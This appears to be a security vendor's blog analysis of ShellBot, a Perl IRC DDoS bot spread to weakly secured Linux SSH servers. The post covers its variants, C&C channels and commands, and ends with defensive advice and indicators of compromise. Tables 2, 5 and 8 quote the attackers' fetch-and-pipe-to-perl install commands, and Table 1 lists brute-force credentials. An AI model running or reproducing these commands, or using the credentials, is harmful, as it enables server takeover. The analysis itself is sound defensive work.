ShellBot Malware Being Distributed to Linux SSH Servers – ASEC BLOG

AhnLab Security Emergency response Center (ASEC) has recently discovered the ShellBot malware being installed on poorly managed Linux SSH servers. ShellBot, also known as PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server. ShellBot is an old malware that has been in steady use and is still being used today to launch attacks against Linux systems.

1. Attack Campaigns Against Linux SSH Servers

Unlike desktop, which is the main work environment for normal users, servers usually take charge of providing specific services. Accordingly, malware attacks are typically carried out through web browsers or email attachments in desktop environments, and threat actors also distribute malware disguised as legitimate software to induce users to install them. Threat actors attacking server environments use a different method since there are limits to distributing malware in the ways mentioned above. Services that are poorly managed or are weak to vulnerability exploitations because they have not been patched to the latest version are the prime targets.

A main example of a poorly managed service is one where simple account credentials are used, causing the server to be vulnerable to dictionary attacks. Remote Desktop Protocol (RDP) and MS-SQL service are prime examples of attack vectors that are used when targeting Windows operating systems. In Linux servers, Secure Shell (SSH) services are usually targeted for attacks. In IoT environments where an old Linux server or embedded Linux OS has been installed, the Telnet service becomes targeted for dictionary attacks.

The ShellBot malware strains that are going to be covered in this post are believed to have been installed after threat actors used account credentials that have been obtained through the use of scanners and SSH BruteForce malware on target systems. After scanning systems that have operational port 22s, threat actors search for systems where the SSH service is active and uses a list of commonly used SSH account credentials to initiate their dictionary attack. The following is a list of the actual account credentials used by threat actors who install ShellBot. (A far greater number of account credentials were used in the actual attacks, but only the main examples were organized here.)

User Password
deploy password
hadoop hadoop
oracle oracle
root 11111
root Passw0rd
ttx ttx2011
ubnt ubnt
Table 1. A portion of the account credentials used by ShellBot operators

2. Internet Relay Chat (IRC) Protocol

A characteristic of ShellBot, aside from the fact that it is developed in Perl, is that it uses an IRC protocol to communicate with C&C servers. IRC is a real-time Internet chat protocol developed in 1988. Users log onto certain channels of certain IRC servers and chat with other users who have logged onto the same channel in real time.

IRC Bot is a bot malware that abuses this IRC service to communicate with C&C servers. The IRC Bot installed on the infected system accesses an IRC server’s channel designated by the threat actor according to the IRC protocol, after which it transmits stolen information to the specified channel, or when the attacker enters a particular string, receives this as a command and performs the corresponding malicious behavior.

IRC has seen consistent use from malware since the past as it uses a preexisting IRC protocol and IRC server without having to develop a separate C&C server and protocol. Although it has been seeing less use by malware targeting Windows operating systems, a large number of IRC Bots are still being distributed on Linux.

3. ShellBot Analysis

ShellBot has been used by various threat actors for a considerable amount of time, and a previous ASEC Blog post covered its use in attacks along with CoinMiners.

Another characteristic of ShellBot is the fact that they all have different forms and features since threat actors can customize them. The team has categorized ShellBot into three main types based on recent findings and summarized the commands, characteristics, and DDoS attacks the malware uses during installation.

3.1. LiGhT’s Modded perlbot v2

The following is a ShellBot named “LiGhT’s Modded perlbot v2”.

Figure 1. ShellBot version information

“LiGhT’s Modded perlbot v2” is being used by a variety of threat actors. The following commands are used in the ShellBot installation after the SSH server has been successfully logged into.

Filename Installation Command
ak wget -qO – x-x-x[.]online/ak|perl
perl nproc; nvidia-smi –list-gpus ;cd /tmp;wget -qO – http://34.225[.]57.146/futai/perl|perl;rm -rf perl
mperl cd /tmp ; wget 193.233.202[.]219/mperl ; perl mperl ; rm -rf mperl
niko2 cd /tmp ; wget 193.233.202[.]219/niko1 ; perl niko1 ; rm -rf niko1
Table 2. Command used to install LiGhT’s Modded perlbot v2

Configuration data such as the C&C server and the name of the channel to join are included in the initial routine of ShellBot. A nickname with the format “IP-[5 random digits]” is used to join the IRC channels.

Figure 2. Configuration data of ShellBot
Filename C&C URL Channel Name
ak 164.90.240[.]68:6667 #nou
per 164.132.224[.]207:80 #mailbomb
mperl 206.189.139[.]152:6667 #Q
niko1 176.123.2[.]3:6667 #X
Table 3. C&C URL and channels of LiGhT’s Modded perlbot v2

The “LiGhT’s Modded perlbot v2” version of ShellBot offers various features which are largely categorized in the table below. Commands that can actually be used for malicious purposes include DDoS commands such as TCP, UDP, and HTTP Flooding. It also includes a variety of commands that allows control over infected systems so that they can be used in other attacks such as reverse shell, log deletion, and scanner.

Command (Category) Description
flooding IRC Flooding
irc IRC control commands
ddos DDoS commands
TCP, UDP, HTTP, SQL Flooding, etc.
news DDoS attack commands against security web pages
hacking Attack commands
MultiScan, Socks5, LogCleaner, Nmap, Reverse Shell, etc.
linuxhelp Help
extras Additional features (Assumed to be related to DDoS attacks)
version Version information output
Table 4. Features supported by LiGhT’s Modded perlbot v2

3.2. DDoS PBot v2.0

Aside from “LiGhT’s Modded perlbot v2”, “DDoS PBot v2.0” is also being used in a variety of attacks. A characteristic of “DDoS PBot v2.0” is that it shows basic information and available commands in the annotations that can be seen during its initial routine.

Figure 3. Initial routine of DDoS PBot v2.0

The following are commands used to install “DDoS PBot v2.0”.

Filename Installation Command
bash wget -qO – 80.94.92[.]241/bash|perl
test.jpg uname -a;wget -q -O- hxxp://185.161.208[.]234/test.jpg|perl;curl -sS hxxp://185.161.208[.]234/test.jpg|perl;nproc;history -c
dred uname -a;lspci | grep -i –color ‘vga|3d|2d’;curl -s -L hxxp://39.165.53[.]17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred
Table 5. Commands used to install DDoS PBot v2.0

“DDoS PBot v2.0” randomly chooses a nickname from a selection of over 500, which include “abbore”, “ably”, and “abyss”, before joining an IRC channel.

Figure 4. List of DDoS PBot v2.0 nicknames
Filename C&C URL Channel Name
bash 51.195.42[.]59:8080 #sex
test.jpg gsm.ftp[.]sh:1080 #test
dred 192.3.141[.]163:6667 #bigfalus
Table 6. C&C URL and channels of DDoS PBot v2.0

Additionally, regular IRC Bots receive commands from the threat actor via the IRC channels to perform malicious acts. Thus, there is a need to verify the threat actor sending commands. Without a verification process, any users can join the channel and control the bots however they want.

In order to do this, the IRC Bot has to perform an additional task where users that have joined the channel must verify their nickname and host address before they can enter a command. For example, in the case of the “bash” malware, the nickname must be either “crond,” “drugs,” or “tab” as defined in the “admins” variable, while the host address must be “localhost” as defined in the “hostauth” variable.

Figure 5. Configuration data of DDoS PBot v2.0

Like regular ShellBots, “DDoS PBot v2.0” also offers a variety of malicious commands including DDoS attack commands.

Command (Category) Description
system Infected system information output
version Version information output
channel IRC control commands
flood DDoS commands
TCP, UDP, HTTP, SQL Flooding, etc.
utils Attack commands
Port Scan, Reverse Shell, file download, etc.
Table 7. Features supported by DDoS PBot v2.0

3.3. PowerBots (C) GohacK

The main characteristic of PowerBots is that it has a simpler form in comparison to the ShellBot types covered above.

Figure 6. Configuration data of PowerBots
Filename Installation Command
ff uname -a ;wget -qO – hxxp://80.68.196[.]6/ff|perl &>>/dev/null
Table 8. Command used to install PowerBots
Filename C&C URL Channel Name
ff 49.212.234[.]206:3303 #x
Table 9. C&C URL and channel of DDoS PBot v2.0

ShellBot types usually offer a variety of DDoS attack features, but since PowerBots mainly focuses on its reverse shell and file downloading capabilities, it is likely that the threat actor installed ShellBot as a backdoor.

Command Description
ps Port scanning
namp NMAP port scanning
rm Delete files in a particular path
version Version information output
down File download
udp UDP Flooding attack
back Reverse Shell
Table 10. Features supported by PowerBots

4. Conclusion

Recently, threat actors have been installing variants of the ShellBot malware on inadequately managed Linux SSH servers. These types of attacks have been occurring consistently since the past and numerous attacks are still being confirmed. If ShellBot is installed, Linux servers can be used as DDoS Bots for DDoS attacks against specific targets after receiving a command from the threat actor. Moreover, the threat actor could use various other backdoor features to install additional malware or launch different types of attacks from the compromised server.

Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for servers accessible from outside to restrict access by attackers. Finally, V3 should be updated to the latest version so that malware infection can be prevented.

File Detection
– Shellbot/Perl.Generic.S1100 (2020.02.12.00)
– Shellbot/Perl.Generic.S1118 (2020.02.19.07)


– bef1a9a49e201095da0bb26642f65a78 : ak
– 3eef28005943fee77f48ac6ba633740d : mperl
– 55e5bfa75d72e9b579e59c00eaeb6922 : niko1
– 6d2c754760ccd6e078de931f472c0f72 : perl
– 7ca3f23f54e8c027a7e8b517995ae433 : bash
– 2cf90bf5b61d605c116ce4715551b7a3 : test.jpg
– 7bc4c22b0f34ef28b69d83a23a6c88c5 : dred
– 176ebfc431daa903ef83e69934759212 : ff

Download URLs
– x-x-x[.]online/ak
– 193.233.202[.]219/mperl
– 193.233.202[.]219/niko1
– hxxp://34.225.57[.]146/futai/perl
– 80.94.92[.]241/bash
– hxxp://185.161.208[.]234/test.jpg
– hxxp://39.165.53[.]17:8088/iposzz/dred
– hxxp://80.68.196[.]6/ff

– 164.90.240[.]68:6667 : ak
– 206.189.139[.]152:6667 : mperl
– 176.123.2[.]3:6667 : niko1
– 164.132.224[.]207:80 : perl
– 51.195.42[.]59:8080 : bash
– gsm.ftp[.]sh:1080 : test.jpg
– 192.3.141[.]163:6667 : dred
– 49.212.234[.]206:3303 : ff

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